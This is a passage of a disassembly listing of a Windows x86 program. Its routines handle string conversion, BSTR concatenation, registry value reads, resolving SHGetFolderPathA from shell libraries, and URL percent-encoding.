mov ecx, eax
sub ecx, edx
mov eax, 10624DD3h
imul ecx
mov eax, edx
pop esi
sar eax, 6
mov ecx, eax
shr ecx, 1Fh
add eax, ecx
retn
; ---------------------------------------------------------------------------
loc_40A0EB: ; CODE XREF: sub_40A0B0+10�j
; sub_40A0B0+15�j
xor eax, eax
pop esi
retn
; ---------------------------------------------------------------------------
loc_40A0EF: ; CODE XREF: sub_40A0B0+B�j
mov ecx, [esi+5CCh]
mov edx, [esi+5C8h]
sub ecx, edx
mov eax, 10624DD3h
imul ecx
mov eax, edx
pop esi
sar eax, 6
mov edx, eax
shr edx, 1Fh
add eax, edx
retn
sub_40A0B0 endp
; ---------------------------------------------------------------------------
align 10h
; =============== S U B R O U T I N E =======================================
sub_40A120 proc near ; CODE XREF: sub_406720+EF�p
var_C = dword ptr -0Ch
arg_0 = dword ptr 4
arg_4 = dword ptr 8
mov eax, 19C8h
call sub_40AF70
lea eax, [esp+0]
lea edx, [esp+arg_0]
push eax
lea eax, [esp+4+arg_4]
push edx
push eax
mov [esp+0Ch+arg_0], 19C0h
mov [esp+0Ch+arg_4], 19Ch
call dword ptr [ecx+5E8h]
test eax, eax
jz short loc_40A15D
or eax, 0FFFFFFFFh
add esp, 19C8h
retn
; ---------------------------------------------------------------------------
loc_40A15D: ; CODE XREF: sub_40A120+31�j
mov eax, [esp+0Ch+var_C]
add esp, 19C8h
retn
sub_40A120 endp ; sp-analysis failed
; ---------------------------------------------------------------------------
align 10h
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
; int __stdcall sub_40A170(int,LPCWSTR lpString,int)
sub_40A170 proc near ; CODE XREF: sub_406560+FA�p
MultiByteStr = byte ptr -20Ch
var_C = dword ptr -0Ch
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
lpString = dword ptr 0Ch
arg_8 = dword ptr 10h
push ebp
mov ebp, esp
sub esp, 20Ch
mov edx, [ebp+lpString]
push ebx
push esi
push edi
lea eax, [ebp+MultiByteStr]
push 200h
push eax
push edx
mov [ebp+MultiByteStr], 0
call dword ptr [ecx+5D8h]
lea eax, [ebp+MultiByteStr]
test eax, eax
jnz short loc_40A1A8
mov [ebp+lpString], eax
jmp short loc_40A1E4
; ---------------------------------------------------------------------------
loc_40A1A8: ; CODE XREF: sub_40A170+31�j
lea ecx, [ebp+MultiByteStr]
push ecx ; lpString
call ds:lstrlenA ; lstrlenA
mov esi, eax
inc esi
lea eax, [esi+esi]
add eax, 3
and al, 0FCh
call sub_40AF70
mov edi, esp
push esi ; cchWideChar
push edi ; lpWideCharStr
lea edx, [ebp+MultiByteStr]
push 0FFFFFFFFh ; cbMultiByte
push edx ; lpMultiByteStr
push 0 ; dwFlags
push 0 ; CodePage
mov word ptr [edi], 0
call ds:MultiByteToWideChar ; MultiByteToWideChar
mov [ebp+lpString], edi
loc_40A1E4: ; CODE XREF: sub_40A170+36�j
mov eax, [ebp+lpString]
push eax ; lpString
call ds:lstrlenW ; lstrlenW
mov ebx, [ebp+arg_8]
mov edi, eax
mov [ebp+var_C], edi
mov eax, [ebx]
test eax, eax
jnz short loc_40A200
xor esi, esi
jmp short loc_40A209
; ---------------------------------------------------------------------------
loc_40A200: ; CODE XREF: sub_40A170+8A�j
push eax ; BSTR
call ds:SysStringLen
mov esi, eax
loc_40A209: ; CODE XREF: sub_40A170+8E�j
lea eax, [esi+edi]
push eax ; ui
push 0 ; strIn
mov [ebp+var_4], eax
call ds:SysAllocStringLen
test eax, eax
mov [ebp+var_8], eax
jz short loc_40A267
lea ecx, [esi+esi]
mov esi, [ebx]
mov [ebp+arg_8], ecx
mov edx, ecx
mov edi, eax
shr ecx, 2
rep movsd
mov ecx, edx
and ecx, 3
rep movsb
mov ecx, [ebp+var_C]
mov esi, [ebp+lpString]
add ecx, ecx
lea edi, [edx+eax]
mov edx, ecx
shr ecx, 2
rep movsd
mov ecx, edx
and ecx, 3
rep movsb
mov ecx, [ebp+var_4]
mov word ptr [eax+ecx*2], 0
mov edx, [ebx]
push edx ; bstrString
call ds:SysFreeString
mov eax, [ebp+var_8]
mov [ebx], eax
loc_40A267: ; CODE XREF: sub_40A170+AD�j
mov ecx, [ebx]
push ecx ; BSTR
call ds:SysStringLen
mov edx, [ebx]
push eax ; ui
push edx ; strIn
call ds:SysAllocStringLen
mov edx, [ebp+arg_0]
lea esi, [ebx+0Ch]
lea esp, [ebp-218h]
mov [edx], eax
mov eax, [ebx+4]
mov [edx+4], eax
mov ecx, [ebx+8]
mov [edx+8], ecx
lea edi, [edx+0Ch]
mov ecx, 7
rep movsd
movsw
mov al, [ebx+2Ah]
pop edi
mov [edx+2Ah], al
pop esi
mov eax, edx
pop ebx
mov esp, ebp
pop ebp
retn 0Ch
sub_40A170 endp
; ---------------------------------------------------------------------------
align 10h
; =============== S U B R O U T I N E =======================================
sub_40A2C0 proc near ; CODE XREF: sub_405C90+4AB�p
mov al, 1
mov [ecx+4B5h], al
retn
sub_40A2C0 endp
; ---------------------------------------------------------------------------
align 10h
; =============== S U B R O U T I N E =======================================
sub_40A2D0 proc near ; CODE XREF: sub_4036E0+10B�p
; sub_4036E0+216�p ...
push ebx
push esi
mov esi, ecx
push edi
mov eax, [esi]
test eax, eax
jnz short loc_40A2DF
xor ebx, ebx
jmp short loc_40A2E8
; ---------------------------------------------------------------------------
loc_40A2DF: ; CODE XREF: sub_40A2D0+9�j
push eax ; BSTR
call ds:SysStringLen
mov ebx, eax
loc_40A2E8: ; CODE XREF: sub_40A2D0+D�j
mov eax, [esi+8]
lea edi, [ebx+1]
cmp eax, edi
ja short loc_40A319
mov eax, [esi+4]
test eax, eax
jz short loc_40A302
push eax ; lpMem
call sub_40AF10
add esp, 4
loc_40A302: ; CODE XREF: sub_40A2D0+27�j
push edi ; dwBytes
mov [esi+8], edi
call sub_40AE50
add esp, 4
mov [esi+4], eax
test eax, eax
jnz short loc_40A319
pop edi
pop esi
pop ebx
retn
; ---------------------------------------------------------------------------
loc_40A319: ; CODE XREF: sub_40A2D0+20�j
; sub_40A2D0+43�j
mov eax, [esi+4]
push 0 ; lpUsedDefaultChar
push 0 ; lpDefaultChar
mov byte ptr [eax], 0
mov ecx, [esi+8]
mov edx, [esi+4]
mov eax, [esi]
push ecx ; cbMultiByte
push edx ; lpMultiByteStr
push ebx ; cchWideChar
push eax ; lpWideCharStr
push 0 ; dwFlags
push 0 ; CodePage
call ds:WideCharToMultiByte ; WideCharToMultiByte
mov ecx, [esi+4]
pop edi
mov byte ptr [ebx+ecx], 0
mov eax, [esi+4]
pop esi
pop ebx
retn
sub_40A2D0 endp
; ---------------------------------------------------------------------------
align 10h
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
; int __stdcall sub_40A350(LPCSTR lpString2,int)
sub_40A350 proc near ; CODE XREF: sub_4039C0+1BF�p
; sub_4039C0+2D6�p
var_C = dword ptr -0Ch
var_8 = dword ptr -8
var_4 = dword ptr -4
lpString2 = dword ptr 8
arg_4 = dword ptr 0Ch
push ebp
mov ebp, esp
sub esp, 0Ch
mov eax, [ebp+arg_4]
push ebx
push esi
push edi
lea esi, [eax+1]
mov [ebp+var_4], ecx
push esi ; dwBytes
call sub_40AE50
mov edi, eax
add esp, 4
test edi, edi
mov [ebp+var_C], edi
jnz short loc_40A382
xor al, al
lea esp, [ebp-18h]
pop edi
pop esi
pop ebx
mov esp, ebp
pop ebp
retn 8
; ---------------------------------------------------------------------------
loc_40A382: ; CODE XREF: sub_40A350+22�j
mov ecx, [ebp+lpString2]
push esi ; iMaxLength
push ecx ; lpString2
push edi ; lpString1
call ds:lstrcpynA ; lstrcpynA
push edi ; lpString
call ds:lstrlenA ; lstrlenA
mov esi, eax
inc esi
lea eax, [esi+esi]
add eax, 3
and al, 0FCh
call sub_40AF70
mov ebx, esp
push esi ; cchWideChar
push ebx ; lpWideCharStr
push 0FFFFFFFFh ; cbMultiByte
push edi ; lpMultiByteStr
push 0 ; dwFlags
push 0 ; CodePage
mov [ebp+lpString2], ebx
mov word ptr [ebx], 0
call ds:MultiByteToWideChar ; MultiByteToWideChar
push ebx ; lpString
call ds:lstrlenW ; lstrlenW
mov edx, [ebp+var_4]
mov ebx, eax
mov [ebp+arg_4], ebx
mov eax, [edx]
test eax, eax
jnz short loc_40A3D7
xor esi, esi
jmp short loc_40A3E0
; ---------------------------------------------------------------------------
loc_40A3D7: ; CODE XREF: sub_40A350+81�j
push eax ; BSTR
call ds:SysStringLen
mov esi, eax
loc_40A3E0: ; CODE XREF: sub_40A350+85�j
add ebx, esi
push ebx ; ui
push 0 ; strIn
mov [ebp+var_8], ebx
call ds:SysAllocStringLen
mov ebx, eax
test ebx, ebx
jz short loc_40A441
mov edx, [ebp+var_4]
lea eax, [esi+esi]
mov ecx, eax
mov edi, ebx
mov esi, [edx]
mov edx, ecx
shr ecx, 2
rep movsd
mov ecx, edx
and ecx, 3
rep movsb
mov ecx, [ebp+arg_4]
mov esi, [ebp+lpString2]
add ecx, ecx
lea edi, [eax+ebx]
mov edx, ecx
mov eax, [ebp+var_8]
shr ecx, 2
rep movsd
mov ecx, edx
and ecx, 3
rep movsb
mov esi, [ebp+var_4]
mov word ptr [ebx+eax*2], 0
mov ecx, [esi]
push ecx ; bstrString
call ds:SysFreeString
mov edi, [ebp+var_C]
mov [esi], ebx
loc_40A441: ; CODE XREF: sub_40A350+A2�j
push edi ; lpMem
call sub_40AF10
add esp, 4
mov al, 1
lea esp, [ebp-18h]
pop edi
pop esi
pop ebx
mov esp, ebp
pop ebp
retn 8
sub_40A350 endp
; ---------------------------------------------------------------------------
align 10h
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
; int __stdcall sub_40A460(HKEY cbData,LPCSTR lpSubKey,LPCSTR lpValueName)
sub_40A460 proc near ; CODE XREF: sub_4039C0+2BE�p
; sub_40A600+F�p
var_18 = dword ptr -18h
var_14 = dword ptr -14h
var_10 = dword ptr -10h
Type = dword ptr -0Ch
var_8 = dword ptr -8
hKey = dword ptr -4
cbData = dword ptr 8
lpSubKey = dword ptr 0Ch
lpValueName = dword ptr 10h
push ebp
mov ebp, esp
sub esp, 18h
mov edx, [ebp+cbData]
push ebx
push esi
lea eax, [ebp+hKey]
push edi
mov [ebp+var_8], ecx
mov ecx, [ebp+lpSubKey]
push eax ; phkResult
push 0 ; samDesired
push 0 ; ulOptions
push ecx ; lpSubKey
push edx ; hKey
mov [ebp+hKey], 0
call ds:RegOpenKeyExA ; RegOpenKeyExA
test eax, eax
jnz loc_40A5EF
mov esi, [ebp+lpValueName]
mov edx, [ebp+hKey]
mov ebx, ds:RegQueryValueExA
lea eax, [ebp+cbData]
push eax ; lpcbData
lea ecx, [ebp+Type]
push 0 ; lpData
push ecx ; lpType
push 0 ; lpReserved
push esi ; lpValueName
push edx ; hKey
call ebx ; RegQueryValueExA
test eax, eax
jnz loc_40A5E5
cmp [ebp+Type], 1
jnz loc_40A5E5
mov eax, [ebp+cbData]
inc eax
push eax ; dwBytes
call sub_40AE50
mov edi, eax
add esp, 4
test edi, edi
mov [ebp+var_18], edi
jnz short loc_40A4ED
mov ecx, [ebp+hKey]
push ecx ; hKey
call ds:RegCloseKey ; RegCloseKey
xor al, al
lea esp, [ebp-24h]
pop edi
pop esi
pop ebx
mov esp, ebp
pop ebp
retn 0Ch
; ---------------------------------------------------------------------------
loc_40A4ED: ; CODE XREF: sub_40A460+73�j
mov ecx, [ebp+hKey]
lea edx, [ebp+cbData]
push edx ; lpcbData
lea eax, [ebp+Type]
push edi ; lpData
push eax ; lpType
push 0 ; lpReserved
push esi ; lpValueName
push ecx ; hKey
call ebx ; RegQueryValueExA
test eax, eax
setz al
test al, al
mov byte ptr [ebp+lpSubKey+3], al
jz loc_40A5C3
push edi ; lpString
call ds:lstrlenA ; lstrlenA
mov esi, eax
inc esi
lea eax, [esi+esi]
add eax, 3
and al, 0FCh
call sub_40AF70
mov ebx, esp
push esi ; cchWideChar
push ebx ; lpWideCharStr
push 0FFFFFFFFh ; cbMultiByte
push edi ; lpMultiByteStr
push 0 ; dwFlags
push 0 ; CodePage
mov [ebp+var_10], ebx
mov word ptr [ebx], 0
call ds:MultiByteToWideChar ; MultiByteToWideChar
push ebx ; lpString
call ds:lstrlenW ; lstrlenW
mov edx, [ebp+var_8]
mov ebx, eax
mov [ebp+lpValueName], ebx
mov eax, [edx]
test eax, eax
jnz short loc_40A558
xor esi, esi
jmp short loc_40A561
; ---------------------------------------------------------------------------
loc_40A558: ; CODE XREF: sub_40A460+F2�j
push eax ; BSTR
call ds:SysStringLen
mov esi, eax
loc_40A561: ; CODE XREF: sub_40A460+F6�j
lea eax, [esi+ebx]
push eax ; ui
push 0 ; strIn
mov [ebp+var_14], eax
call ds:SysAllocStringLen
mov ebx, eax
test ebx, ebx
jz short loc_40A5C3
mov edx, [ebp+var_8]
lea eax, [esi+esi]
mov ecx, eax
mov edi, ebx
mov esi, [edx]
mov edx, ecx
shr ecx, 2
rep movsd
mov ecx, edx
and ecx, 3
rep movsb
mov ecx, [ebp+lpValueName]
mov esi, [ebp+var_10]
add ecx, ecx
lea edi, [eax+ebx]
mov edx, ecx
mov eax, [ebp+var_14]
shr ecx, 2
rep movsd
mov ecx, edx
and ecx, 3
rep movsb
mov esi, [ebp+var_8]
mov word ptr [ebx+eax*2], 0
mov ecx, [esi]
push ecx ; bstrString
call ds:SysFreeString
mov edi, [ebp+var_18]
mov [esi], ebx
loc_40A5C3: ; CODE XREF: sub_40A460+A9�j
; sub_40A460+114�j
mov edx, [ebp+hKey]
push edx ; hKey
call ds:RegCloseKey ; RegCloseKey
push edi ; lpMem
call sub_40AF10
mov al, byte ptr [ebp+lpSubKey+3]
add esp, 4
lea esp, [ebp-24h]
pop edi
pop esi
pop ebx
mov esp, ebp
pop ebp
retn 0Ch
; ---------------------------------------------------------------------------
loc_40A5E5: ; CODE XREF: sub_40A460+4F�j
; sub_40A460+59�j
mov eax, [ebp+hKey]
push eax ; hKey
call ds:RegCloseKey ; RegCloseKey
loc_40A5EF: ; CODE XREF: sub_40A460+2B�j
lea esp, [ebp-24h]
xor al, al
pop edi
pop esi
pop ebx
mov esp, ebp
pop ebp
retn 0Ch
sub_40A460 endp
; ---------------------------------------------------------------------------
align 10h
; =============== S U B R O U T I N E =======================================
; int __stdcall sub_40A600(LPCSTR lpSubKey,LPCSTR lpValueName)
sub_40A600 proc near ; CODE XREF: sub_4039C0+65F�p
lpSubKey = dword ptr 4
lpValueName = dword ptr 8
mov eax, [esp+lpValueName]
mov edx, [esp+lpSubKey]
push eax ; lpValueName
push edx ; lpSubKey
push 80000001h ; cbData
call sub_40A460
retn 8
sub_40A600 endp
; ---------------------------------------------------------------------------
align 10h
; =============== S U B R O U T I N E =======================================
; int __stdcall sub_40A620(int,int,LPCSTR lpString2)
sub_40A620 proc near ; CODE XREF: sub_40A680+2B�p
; sub_40A680+43�p ...
arg_0 = dword ptr 4
arg_4 = dword ptr 8
lpString2 = dword ptr 0Ch
push ebx
push esi
push edi
mov edi, [esp+0Ch+lpString2]
mov esi, ecx
push edi ; lpLibFileName
call ds:LoadLibraryA ; LoadLibraryA
mov ebx, [esp+0Ch+arg_0]
test eax, eax
mov [ebx], eax
jnz short loc_40A642
pop edi
pop esi
xor al, al
pop ebx
retn 0Ch
; ---------------------------------------------------------------------------
loc_40A642: ; CODE XREF: sub_40A620+18�j
push offset aShgetfolderpat ; "SHGetFolderPathA"
push eax ; hModule
call ds:GetProcAddress ; GetProcAddress
mov ecx, [esp+0Ch+arg_4]
test eax, eax
mov [ecx], eax
jnz short loc_40A669
mov edx, [ebx]
push edx ; hLibModule
call ds:FreeLibrary ; FreeLibrary
pop edi
pop esi
xor al, al
pop ebx
retn 0Ch
; ---------------------------------------------------------------------------
loc_40A669: ; CODE XREF: sub_40A620+36�j
push 1Dh ; iMaxLength
add esi, 0Ch
push edi ; lpString2
push esi ; lpString1
call ds:lstrcpynA ; lstrcpynA
pop edi
pop esi
mov al, 1
pop ebx
retn 0Ch
sub_40A620 endp
; ---------------------------------------------------------------------------
align 10h
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
; int __stdcall sub_40A680(LPCWSTR lpString)
sub_40A680 proc near ; CODE XREF: sub_4039C0+28C�p
; sub_4039C0+29D�p ...
MultiByteStr = byte ptr -118h
var_14 = dword ptr -14h
var_10 = dword ptr -10h
var_C = dword ptr -0Ch
hLibModule = dword ptr -8
var_4 = dword ptr -4
lpString = dword ptr 8
push ebp
mov ebp, esp
sub esp, 118h
push ebx
push esi
push edi
mov edi, ecx
mov [ebp+var_10], edi
mov al, [edi+2Ah]
test al, al
jnz short loc_40A6DE
lea eax, [ebp+var_4]
push offset aShell32_dll ; "Shell32.dll"
lea ecx, [ebp+hLibModule]
push eax ; int
push ecx ; int
mov ecx, edi
mov byte ptr [edi+2Ah], 1
call sub_40A620
test al, al
jnz short loc_40A71C
lea edx, [ebp+var_4]
push offset aShfolder_dll ; "SHFolder.dll"
lea eax, [ebp+hLibModule]
push edx ; int
push eax ; int
mov ecx, edi
call sub_40A620
test al, al
jnz short loc_40A71C
mov [edi+0Ch], al
lea esp, [ebp-124h]
pop edi
pop esi
pop ebx
mov esp, ebp
pop ebp
retn 4
; ---------------------------------------------------------------------------
loc_40A6DE: ; CODE XREF: sub_40A680+16�j
mov cl, [edi+0Ch]
lea eax, [edi+0Ch]
test cl, cl
jnz short loc_40A6F9
xor al, al
lea esp, [ebp-124h]
pop edi
pop esi
pop ebx
mov esp, ebp
pop ebp
retn 4
; ---------------------------------------------------------------------------
loc_40A6F9: ; CODE XREF: sub_40A680+66�j
lea ecx, [ebp+var_4]
push eax ; lpString2
lea edx, [ebp+hLibModule]
push ecx ; int
push edx ; int
mov ecx, edi
call sub_40A620
test al, al
jnz short loc_40A71C
lea esp, [ebp-124h]
pop edi
pop esi
pop ebx
mov esp, ebp
pop ebp
retn 4
; ---------------------------------------------------------------------------
loc_40A71C: ; CODE XREF: sub_40A680+32�j
; sub_40A680+4A�j ...
mov ecx, [ebp+lpString]
lea eax, [ebp+MultiByteStr]
push eax
push 0
push 0
xor bl, bl
push ecx
push 0
mov [ebp+MultiByteStr], bl
call [ebp+var_4]
test eax, eax
jl loc_40A822
cmp eax, 1
jg loc_40A822
mov al, [ebp+MultiByteStr]
test al, al
jz loc_40A822
lea edx, [ebp+MultiByteStr]
test edx, edx
jnz short loc_40A766
mov [ebp+lpString], edx
jmp short loc_40A7A2
; ---------------------------------------------------------------------------
loc_40A766: ; CODE XREF: sub_40A680+DF�j
lea eax, [ebp+MultiByteStr]
push eax ; lpString
call ds:lstrlenA ; lstrlenA
mov esi, eax
inc esi
lea eax, [esi+esi]
add eax, 3
and al, 0FCh
call sub_40AF70
mov ebx, esp
push esi ; cchWideChar
push ebx ; lpWideCharStr
lea ecx, [ebp+MultiByteStr]
push 0FFFFFFFFh ; cbMultiByte
push ecx ; lpMultiByteStr
push 0 ; dwFlags
push 0 ; CodePage
mov word ptr [ebx], 0
call ds:MultiByteToWideChar ; MultiByteToWideChar
mov [ebp+lpString], ebx
loc_40A7A2: ; CODE XREF: sub_40A680+E4�j
mov edx, [ebp+lpString]
push edx ; lpString
call ds:lstrlenW ; lstrlenW
mov ebx, eax
mov eax, [edi]
test eax, eax
mov [ebp+var_C], ebx
jnz short loc_40A7BB
xor esi, esi
jmp short loc_40A7C4
; ---------------------------------------------------------------------------
loc_40A7BB: ; CODE XREF: sub_40A680+135�j
push eax ; BSTR
call ds:SysStringLen
mov esi, eax
loc_40A7C4: ; CODE XREF: sub_40A680+139�j
lea eax, [esi+ebx]
push eax ; ui
push 0 ; strIn
mov [ebp+var_14], eax
call ds:SysAllocStringLen
mov ebx, eax
test ebx, ebx
jz short loc_40A820
lea eax, [esi+esi]
mov esi, [edi]
mov ecx, eax
mov edi, ebx
mov edx, ecx
shr ecx, 2
rep movsd
mov ecx, edx
and ecx, 3
rep movsb
mov ecx, [ebp+var_C]
mov esi, [ebp+lpString]
add ecx, ecx
lea edi, [eax+ebx]
mov edx, ecx
mov eax, [ebp+var_14]
shr ecx, 2
rep movsd
mov ecx, edx
and ecx, 3
rep movsb
mov esi, [ebp+var_10]
mov word ptr [ebx+eax*2], 0
mov ecx, [esi]
push ecx ; bstrString
call ds:SysFreeString
mov [esi], ebx
loc_40A820: ; CODE XREF: sub_40A680+157�j
mov bl, 1
loc_40A822: ; CODE XREF: sub_40A680+BA�j
; sub_40A680+C3�j ...
mov edx, [ebp+hLibModule]
push edx ; hLibModule
call ds:FreeLibrary ; FreeLibrary
lea esp, [ebp-124h]
mov al, bl
pop edi
pop esi
pop ebx
mov esp, ebp
pop ebp
retn 4
sub_40A680 endp
; ---------------------------------------------------------------------------
align 10h
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
; int __stdcall sub_40A840(HINSTANCE hInstance,UINT bstrString)
sub_40A840 proc near ; CODE XREF: sub_4036E0+F9�p
; sub_4039C0+152�p ...
String = byte ptr -208h
var_8 = dword ptr -8
var_4 = dword ptr -4
hInstance = dword ptr 8
bstrString = dword ptr 0Ch
push ebp
mov ebp, esp
sub esp, 208h
mov edx, [ebp+hInstance]
push ebx
push esi
push edi
mov edi, ecx
lea eax, [ebp+String]
mov ecx, [ebp+bstrString]
push 200h ; cchBufferMax
push eax ; lpBuffer
push ecx ; uID
push edx ; hInstance
mov [ebp+var_4], edi
call ds:LoadStringA ; LoadStringA
mov ebx, ds:SysFreeString
push 0 ; bstrString
mov esi, eax
call ebx ; SysFreeString
test esi, esi
jz short loc_40A8E4
lea eax, [ebp+String]
test eax, eax
jnz short loc_40A889
xor ebx, ebx
jmp short loc_40A8C2
; ---------------------------------------------------------------------------
loc_40A889: ; CODE XREF: sub_40A840+43�j
lea ecx, [ebp+String]
push ecx ; lpString
call ds:lstrlenA ; lstrlenA
mov esi, eax
inc esi
lea eax, [esi+esi]
add eax, 3
and al, 0FCh
call sub_40AF70
mov ebx, esp
push esi ; cchWideChar
push ebx ; lpWideCharStr
lea edx, [ebp+String]
push 0FFFFFFFFh ; cbMultiByte
push edx ; lpMultiByteStr
push 0 ; dwFlags
push 0 ; CodePage
mov word ptr [ebx], 0
call ds:MultiByteToWideChar ; MultiByteToWideChar
loc_40A8C2: ; CODE XREF: sub_40A840+47�j
push ebx ; psz
call ds:SysAllocString
mov esi, ds:SysStringLen
push eax ; BSTR
mov [ebp+bstrString], eax
call esi ; SysStringLen
mov ebx, eax
mov eax, [edi]
test eax, eax
mov [ebp+hInstance], ebx
jnz short loc_40A8F9
xor esi, esi
jmp short loc_40A8FE
; ---------------------------------------------------------------------------
loc_40A8E4: ; CODE XREF: sub_40A840+39�j
push 0 ; bstrString
call ebx ; SysFreeString
xor al, al
lea esp, [ebp-214h]
pop edi
pop esi
pop ebx
mov esp, ebp
pop ebp
retn 8
; ---------------------------------------------------------------------------
loc_40A8F9: ; CODE XREF: sub_40A840+9E�j
push eax ; BSTR
call esi ; SysStringLen
mov esi, eax
loc_40A8FE: ; CODE XREF: sub_40A840+A2�j
lea eax, [esi+ebx]
push eax ; ui
push 0 ; strIn
mov [ebp+var_8], eax
call ds:SysAllocStringLen
mov ebx, eax
test ebx, ebx
jz short loc_40A95A
lea eax, [esi+esi]
mov esi, [edi]
mov ecx, eax
mov edi, ebx
mov edx, ecx
shr ecx, 2
rep movsd
mov ecx, edx
and ecx, 3
rep movsb
mov ecx, [ebp+hInstance]
mov esi, [ebp+bstrString]
add ecx, ecx
lea edi, [eax+ebx]
mov edx, ecx
mov eax, [ebp+var_8]
shr ecx, 2
rep movsd
mov ecx, edx
and ecx, 3
rep movsb
mov esi, [ebp+var_4]
mov word ptr [ebx+eax*2], 0
mov ecx, [esi]
push ecx ; bstrString
call ds:SysFreeString
mov [esi], ebx
loc_40A95A: ; CODE XREF: sub_40A840+D1�j
mov edx, [ebp+bstrString]
push edx ; bstrString
call ds:SysFreeString
lea esp, [ebp-214h]
mov al, 1
pop edi
pop esi
pop ebx
mov esp, ebp
pop ebp
retn 8
sub_40A840 endp
; ---------------------------------------------------------------------------
align 10h
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
; int __stdcall sub_40A980(LPCWSTR lpString)
sub_40A980 proc near ; CODE XREF: sub_4039C0+42E�p
; sub_4051A0+2DC�p ...
MultiByteStr = byte ptr -2Ch
var_C = dword ptr -0Ch
var_8 = dword ptr -8
var_4 = dword ptr -4
lpString = dword ptr 8
push ebp
mov ebp, esp
sub esp, 2Ch
push ebx
push esi
push edi
mov edi, ecx
mov ecx, [ebp+lpString]
lea eax, [ebp+MultiByteStr]
push 0Ah
push eax
push ecx
mov [ebp+var_C], edi
call sub_40BE1D
lea edx, [ebp+MultiByteStr]
add esp, 0Ch
test edx, edx
jnz short loc_40A9AC
mov [ebp+lpString], edx
jmp short loc_40A9E2
; ---------------------------------------------------------------------------
loc_40A9AC: ; CODE XREF: sub_40A980+25�j
lea eax, [ebp+MultiByteStr]
push eax ; lpString
call ds:lstrlenA ; lstrlenA
mov esi, eax
inc esi
lea eax, [esi+esi]
add eax, 3
and al, 0FCh
call sub_40AF70
mov ebx, esp
push esi ; cchWideChar
push ebx ; lpWideCharStr
lea ecx, [ebp+MultiByteStr]
push 0FFFFFFFFh ; cbMultiByte
push ecx ; lpMultiByteStr
push 0 ; dwFlags
push 0 ; CodePage
mov word ptr [ebx], 0
call ds:MultiByteToWideChar ; MultiByteToWideChar
mov [ebp+lpString], ebx
loc_40A9E2: ; CODE XREF: sub_40A980+2A�j
mov edx, [ebp+lpString]
push edx ; lpString
call ds:lstrlenW ; lstrlenW
mov ebx, eax
mov eax, [edi]
test eax, eax
mov [ebp+var_4], ebx
jnz short loc_40A9FB
xor esi, esi
jmp short loc_40AA04
; ---------------------------------------------------------------------------
loc_40A9FB: ; CODE XREF: sub_40A980+75�j
push eax ; BSTR
call ds:SysStringLen
mov esi, eax
loc_40AA04: ; CODE XREF: sub_40A980+79�j
lea eax, [esi+ebx]
push eax ; ui
push 0 ; strIn
mov [ebp+var_8], eax
call ds:SysAllocStringLen
mov ebx, eax
test ebx, ebx
jz short loc_40AA60
lea eax, [esi+esi]
mov esi, [edi]
mov ecx, eax
mov edi, ebx
mov edx, ecx
shr ecx, 2
rep movsd
mov ecx, edx
and ecx, 3
rep movsb
mov ecx, [ebp+var_4]
mov esi, [ebp+lpString]
add ecx, ecx
lea edi, [eax+ebx]
mov edx, ecx
mov eax, [ebp+var_8]
shr ecx, 2
rep movsd
mov ecx, edx
and ecx, 3
rep movsb
mov esi, [ebp+var_C]
mov word ptr [ebx+eax*2], 0
mov ecx, [esi]
push ecx ; bstrString
call ds:SysFreeString
mov [esi], ebx
loc_40AA60: ; CODE XREF: sub_40A980+97�j
lea esp, [ebp-38h]
pop edi
pop esi
pop ebx
mov esp, ebp
pop ebp
retn 4
sub_40A980 endp
; ---------------------------------------------------------------------------
align 10h
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
; int __stdcall sub_40AA70(LPCSTR lpMem)
sub_40AA70 proc near ; CODE XREF: sub_4051A0+28D�p
var_10 = dword ptr -10h
var_C = dword ptr -0Ch
var_8 = dword ptr -8
var_4 = dword ptr -4
lpMem = dword ptr 8
push ebp
mov ebp, esp
sub esp, 10h
push ebx
mov ebx, [ebp+lpMem]
push esi
push edi
mov [ebp+var_4], ecx
push ebx ; lpString
call ds:lstrlenA ; lstrlenA
lea eax, [eax+eax*2+1]
push eax ; dwBytes
call sub_40AE50
mov edi, eax
add esp, 4
test edi, edi
mov [ebp+lpMem], edi
jnz short loc_40AAAA
xor al, al
lea esp, [ebp-1Ch]
pop edi
pop esi
pop ebx
mov esp, ebp
pop ebp
retn 4
; ---------------------------------------------------------------------------
loc_40AAAA: ; CODE XREF: sub_40AA70+2A�j
mov al, [ebx]
mov esi, edi
test al, al
jz short loc_40AAF4
dec edi
loc_40AAB3: ; CODE XREF: sub_40AA70+7F�j
movsx eax, al
movsx ecx, al
mov [esi], al
inc esi
inc edi
sub ecx, 20h
inc ebx
cmp ecx, 1Eh ; switch 31 cases
ja short loc_40AAEB ; default
; jumptable 0040AACE cases 1,2,4,7-27,29
xor edx, edx
mov dl, ds:byte_40ABCC[ecx]
jmp ds:off_40ABC4[edx*4] ; switch jump
loc_40AAD5: ; DATA XREF: .text:off_40ABC4�o
push eax ; jumptable 0040AACE cases 0,3,5,6,28,30
push offset a2x ; "%%%2x"
push edi ; LPSTR
call ds:wsprintfA ; wsprintfA
add esp, 0Ch
add esi, 2
add edi, 2
loc_40AAEB: ; CODE XREF: sub_40AA70+54�j
; sub_40AA70+5E�j
; DATA XREF: ...
mov al, [ebx] ; default
; jumptable 0040AACE cases 1,2,4,7-27,29
test al, al
jnz short loc_40AAB3
mov edi, [ebp+lpMem]
loc_40AAF4: ; CODE XREF: sub_40AA70+40�j
push edi ; lpString
mov byte ptr [esi], 0
call ds:lstrlenA ; lstrlenA
mov esi, eax
inc esi
lea eax, [esi+esi]
add eax, 3
and al, 0FCh
call sub_40AF70
mov eax, [ebp+lpMem]
mov ebx, esp
push esi ; cchWideChar
push ebx ; lpWideCharStr
push 0FFFFFFFFh ; cbMultiByte
push eax ; lpMultiByteStr
push 0 ; dwFlags
push 0 ; CodePage
mov [ebp+var_C], ebx
mov word ptr [ebx], 0
call ds:MultiByteToWideChar ; MultiByteToWideChar
push ebx ; lpString
call ds:lstrlenW ; lstrlenW
mov edi, [ebp+var_4]
mov ebx, eax
mov [ebp+var_8], ebx
mov eax, [edi]
test eax, eax
jnz short loc_40AB43
xor esi, esi
jmp short loc_40AB4C
; ---------------------------------------------------------------------------
loc_40AB43: ; CODE XREF: sub_40AA70+CD�j
